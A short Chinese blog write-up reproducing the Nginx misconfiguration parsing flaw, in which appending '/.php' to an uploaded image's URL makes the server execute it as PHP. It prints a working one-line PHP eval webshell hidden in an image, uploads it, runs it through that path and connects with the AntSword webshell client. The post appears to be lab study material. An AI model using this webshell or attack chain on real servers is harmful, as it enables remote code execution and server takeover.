漏洞復現(xiàn)-Nginx 解析漏洞

-Nginx 解析漏洞

Nginx 1.x 最新版
PHP 7.x最新版
由此可知,該漏洞與Nginx、php版本無關,屬于用戶配置不當造成的解析漏洞。

漏洞復現(xiàn)

開始配置環(huán)境

image.png

訪問
http://your-ip/uploadfiles/nginx.png
與增加后綴/.php后的圖片文件
http://your-ip/uploadfiles/nginx.png/.php
image.png

image.png

可以發(fā)現(xiàn)png圖片文件被當成php來解析,可以配合上傳漏洞上傳后門腳本。
http://your-ip/index.php存在文件上傳
image.png

利用cmd命令合成一個圖片馬

<?php
@eval($_POST['ant']);
?>
image.png

image.png

然后將圖片馬上傳到網站


image.png

上傳成功,訪問路徑


image.png

成功訪問圖片,在路徑后加/.php觀察


image.png

成解析成php代碼。
然后利用蟻劍來嘗試連接。
image.png

成功拿下后臺。


image.png
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

友情鏈接更多精彩內容